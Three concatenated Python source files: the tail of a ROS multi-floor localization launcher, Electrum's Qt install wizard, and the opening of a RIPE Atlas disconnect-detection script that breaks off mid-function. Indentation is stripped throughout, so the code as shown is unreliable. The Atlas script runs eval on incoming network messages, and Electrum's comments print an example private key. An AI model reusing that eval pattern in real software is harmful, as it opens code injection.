samples_global_all = []
floor_set = set()
for map_dict in map_list:
floor = float(map_dict["floor"])
floor_str = str(int(map_dict["floor"]))
area = int(map_dict["area"]) if "area" in map_dict else 0
area_str = str(area)
node_id = map_dict["node_id"]
frame_id = map_dict["frame_id"]
anchor = geoutil.Anchor(lat = map_dict["latitude"],
lng = map_dict["longitude"],
rotate = map_dict["rotate"]
)
load_state_filename = resource_utils.get_filename(map_dict["load_state_filename"])
samples_filename = resource_utils.get_filename(map_dict["samples_filename"])
map_filename = map_dict["map_filename"] if "map_filename" in map_dict else "" # keep the original string without resource resolving. if not found in map_dict, use "".
floor_set.add(floor)
with open(samples_filename, "r") as f:
samples = json.load(f)
# extract iBeacon samples
samples = extract_samples(samples, key="iBeacon")
# append area information to the samples
for s in samples:
s["information"]["area"] = area
# fit localizer for the floor
ble_localizer_floor = SimpleRSSLocalizer(n_neighbors=n_neighbors_local, min_beacons=min_beacons_local, rssi_offset=rssi_offset)
ble_localizer_floor.fit(samples)
if floor not in multi_floor_manager.ble_localizer_dict:
multi_floor_manager.ble_localizer_dict[floor] = {}
multi_floor_manager.ble_localizer_dict[floor][area] = {}
# run ros nodes
for mode in modes:
namespace = node_id+"/"+str(mode)
sub_mode = "tracking" if mode == LocalizationMode.TRACK else "rss_localization"
included_configuration_basename = configuration_file_prefix + "_" + sub_mode + ".lua"
tmp_configuration_basename = temporary_directory_name + "/" + configuration_file_prefix + "_" + sub_mode + "_" + floor_str + "_" + area_str + ".lua"
# create temporary config files
with open(os.path.join(configuration_directory, tmp_configuration_basename), "w") as f:
f.write("include \""+included_configuration_basename+"\"")
f.write("options.map_frame = \""+frame_id+"\"")
f.write("options.odom_frame = \""+multi_floor_manager.odom_frame+"\"")
f.write("options.published_frame = \""+multi_floor_manager.published_frame+"\"")
f.write("return options")
package1 = "cartographer_ros"
executable1 = "cartographer_node"
package2 = "mf_localization"
executable2 = "trajectory_restarter.py"
# run cartographer node
node1 = roslaunch.core.Node(package1, executable1,
name="cartographer_node",
namespace = namespace,
remap_args = [("scan", scan_topic_name), ("points2", points2_topic_name), ("imu", imu_topic_name), ("odom", odom_topic_name)],
output = "screen"
)
node1.args = "-configuration_directory " + configuration_directory \
+ " -configuration_basename " + tmp_configuration_basename \
+ " -load_state_filename " + load_state_filename \
+ " -start_trajectory_with_default_topics=false"
script1 = launch.launch(node1)
# trajectory restarter
# set ros parameters before running a node that uses the parameters
rospy.set_param(namespace+"/trajectory_restarter/configuration_directory", configuration_directory)
rospy.set_param(namespace+"/trajectory_restarter/configuration_basename", tmp_configuration_basename)
node2 = roslaunch.core.Node(package2, executable2,
namespace = namespace,
name="trajectory_restarter",
output = "screen")
script2 = launch.launch(node2)
# create floor_manager
floor_manager = FloorManager()
floor_manager.configuration_directory = configuration_directory
floor_manager.configuration_basename = tmp_configuration_basename
multi_floor_manager.ble_localizer_dict[floor][area][mode] = floor_manager
# set values to floor_manager
for mode in modes:
floor_manager = multi_floor_manager.ble_localizer_dict[floor][area][mode]
floor_manager.localizer = ble_localizer_floor
floor_manager.node_id = node_id
floor_manager.frame_id = frame_id
floor_manager.map_filename = map_filename
# publishers
floor_manager.imu_pub = rospy.Publisher(node_id+"/"+str(mode)+imu_topic_name , Imu, queue_size=4000)
floor_manager.points_pub = rospy.Publisher(node_id+"/"+str(mode)+points2_topic_name, PointCloud2, queue_size=100)
floor_manager.initialpose_pub = rospy.Publisher(node_id+"/"+str(mode)+initialpose_topic_name, PoseWithCovarianceStamped, queue_size=10)
floor_manager.odom_pub = rospy.Publisher(node_id+"/"+str(mode)+odom_topic_name, Odometry, queue_size=100)
# rospy service
rospy.wait_for_service(node_id+"/"+str(mode)+'/get_trajectory_states')
rospy.wait_for_service(node_id+"/"+str(mode)+'/finish_trajectory')
rospy.wait_for_service(node_id+"/"+str(mode)+'/start_trajectory')
floor_manager.get_trajectory_states = rospy.ServiceProxy(node_id+"/"+str(mode)+'/get_trajectory_states', GetTrajectoryStates)
floor_manager.finish_trajectory = rospy.ServiceProxy(node_id+"/"+str(mode)+'/finish_trajectory', FinishTrajectory)
floor_manager.start_trajectory = rospy.ServiceProxy(node_id+"/"+str(mode)+'/start_trajectory', StartTrajectory)
multi_floor_manager.ble_localizer_dict[floor][area][mode] = floor_manager
# convert samples to the coordinate of global_anchor
samples_global = convert_samples_coordinate(samples, anchor, global_anchor, floor)
samples_global_all.extend(samples_global)
# calculate static transform
xy = geoutil.global2local(anchor, global_anchor)
yaw = - math.radians(anchor.rotate - global_anchor.rotate)
t = TransformStamped()
t.header.stamp = rospy.Time.now()
t.header.frame_id = multi_floor_manager.global_map_frame
t.child_frame_id = frame_id
z = floor * meters_per_floor # for visualization
trans = Vector3(xy.x, xy.y, z)
t.transform.translation = trans
q = tf_conversions.transformations.quaternion_from_euler(0, 0, yaw, 'sxyz')
rotation = Quaternion(*q)
t.transform.rotation = rotation
multi_floor_manager.transforms.append(t)
multi_floor_manager.floor_list = list(floor_set)
# a localizer to estimate floor
multi_floor_manager.ble_floor_localizer = SimpleRSSLocalizer(n_neighbors=n_neighbors_floor, min_beacons=min_beacons_floor, rssi_offset=rssi_offset)
multi_floor_manager.ble_floor_localizer.fit(samples_global_all)
# area localizer
X_area = []
Y_area = []
for s in samples_global_all:
x_a = float(s["information"]["x"])
y_a = float(s["information"]["y"])
f_a = float(s["information"]["floor"])
f_a = f_a * multi_floor_manager.area_floor_const # scale floor so that nearest neighbors are never picked across floors
X_area.append([x_a, y_a, f_a])
area = int(s["information"]["area"])
Y_area.append(area)
from sklearn.neighbors import KNeighborsClassifier
area_classifier = KNeighborsClassifier(n_neighbors=1)
area_classifier.fit(X_area, Y_area)
multi_floor_manager.area_localizer = area_classifier
# global subscribers
imu_sub = rospy.Subscriber("imu", Imu, multi_floor_manager.imu_callback)
scan_sub = rospy.Subscriber("scan", LaserScan, multi_floor_manager.scan_callback)
points2_sub = rospy.Subscriber("points2", PointCloud2, multi_floor_manager.points_callback)
beacons_sub = rospy.Subscriber("beacons", String, multi_floor_manager.beacons_callback, queue_size=1)
initialpose_sub = rospy.Subscriber("initialpose", PoseWithCovarianceStamped, multi_floor_manager.initialpose_callback)
odom_sub = rospy.Subscriber("odom", Odometry, multi_floor_manager.odom_callback)
# services
stop_localization_service = rospy.Service("stop_localization", StopLocalization, multi_floor_manager.stop_localization_callback)
start_localization_service = rospy.Service("start_localization", StartLocalization, multi_floor_manager.start_localization_callback)
restart_localization_service = rospy.Service("restart_localization", RestartLocalization, multi_floor_manager.restart_localization_callback)
enable_relocalization_service = rospy.Service("enable_auto_relocalization", MFTrigger, multi_floor_manager.enable_relocalization_callback)
disable_relocalization_service = rospy.Service("disable_auto_relocalization", MFTrigger, multi_floor_manager.disable_relocalization_callback)
set_current_floor_service = rospy.Service("set_current_floor", MFSetInt, multi_floor_manager.set_current_floor_callback)
convert_local_to_global_service = rospy.Service("convert_local_to_global", ConvertLocalToGlobal, multi_floor_manager.convert_local_to_global_callback)
# publish map->local_map by /tf_static
multi_floor_manager.send_static_transforms()
# timers
timer_duration = 0.01 # 100 Hz
# publish current_frame -> map when map_frame is not defined by global_map_frame
# if global_map_frame == local_map_frame, local_map_frame is used to represent the origin of the global map
# if global_map_frame != local_map_frame, local_map_frame is used to represent the origin of the local map corresponding to the origin of current_frame
if multi_floor_manager.local_map_frame != multi_floor_manager.global_map_frame:
local_map_tf_timer = rospy.Timer(rospy.Duration(timer_duration), multi_floor_manager.local_map_tf_timer_callback)
# global position
global_position_timer = rospy.Timer(rospy.Duration(global_position_interval), multi_floor_manager.global_position_callback)
# detect pose-graph optimization: a jump in the map->odom transform larger than odom_dist_th is treated as an optimization event (used in beacons_callback to switch INIT -> TRACK)
multi_floor_manager.map2odom = None
# ros spin
spin_rate = 10 # 10 Hz
r = rospy.Rate(spin_rate)
# for loginfo
log_interval = spin_rate # loginfo at about 1 Hz
while not rospy.is_shutdown():
# detect odom movement
try:
t = tfBuffer.lookup_transform(multi_floor_manager.global_map_frame, multi_floor_manager.odom_frame, rospy.Time(0))
if multi_floor_manager.is_active:
if multi_floor_manager.map2odom is not None:
map2odom = multi_floor_manager.map2odom # local variable
dx = map2odom.transform.translation.x - t.transform.translation.x
dy = map2odom.transform.translation.y - t.transform.translation.y
dz = map2odom.transform.translation.z - t.transform.translation.z
dist = np.sqrt(dx**2 + dy**2 + dz**2)
if odom_dist_th < dist:
multi_floor_manager.optimization_detected = True
multi_floor_manager.odom_displacement = dist
multi_floor_manager.map2odom = t
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
if (multi_floor_manager.prev_spin_count is None
or multi_floor_manager.spin_count - multi_floor_manager.prev_spin_count > log_interval):
multi_floor_manager.prev_spin_count = multi_floor_manager.spin_count
rospy.loginfo('LookupTransform Error '+multi_floor_manager.global_map_frame+" -> "+multi_floor_manager.odom_frame)
multi_floor_manager.spin_count += 1
r.sleep()
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage
from electrum.util import UserCancelled, InvalidPassword, WalletFileException
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
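# Illustrative sketch (hypothetical step, not part of Electrum): a method wrapped
# with @wizard_dialog receives a ``run_next`` callback; whatever the wrapped method
# returns is forwarded to ``run_next``, while GoBack/UserCancelled are translated
# into Back/Cancel navigation. For example:
#
#   @wizard_dialog
#   def confirm_question(self, message, run_next):
#       vbox = QVBoxLayout()
#       vbox.addWidget(WWLabel(message))
#       self.exec_layout(vbox, title=_('Confirm'))
#       return True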
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
BaseWizard.__init__(self, config, plugins)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Needed for Qt on macOS. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(QLineEdit.Password)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None)
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
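# Note: loop.exec_() returns 1 for "Back" (raises GoBack above), 2 for "Next"
# (see the "2 = next" comment in select_storage), and a falsy value when the
# dialog is cancelled, which raises UserCancelled when raise_on_cancel is set.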
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
disco.py
|
from __future__ import division, print_function
import configparser
import json
import logging
import os
import sys
import threading
import time
import traceback
import queue as Queue  # the "Queue" module was renamed to "queue" in Python 3
import numpy as np
import pybursts
from probeEnrichInfo import probeEnrichInfo
from pprint import PrettyPrinter
import gzip
import collections
from os import listdir
from os.path import isfile, join
from datetime import datetime
from ripe.atlas.cousteau import AtlasResultsRequest
from output_writer import outputWriter
"""Methods for atlas stream"""
class ConnectionError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def on_result_response(*args):
"""
Function that will be called every time we receive a new result.
Args is a tuple, so you should use args[0] to access the real message.
"""
# print args[0]
item = args[0]
event = eval(str(item))
# print(event)
dataList.append(event)
if DETECT_DISCO_BURST:
if event["event"] == "disconnect":
dataQueueDisconnect.put(event)
if DETECT_CON_BURST:
if event["event"] == "connect":
dataQueueConnect.put(event)
def on_error(*args):
# print "got in on_error"
# print args
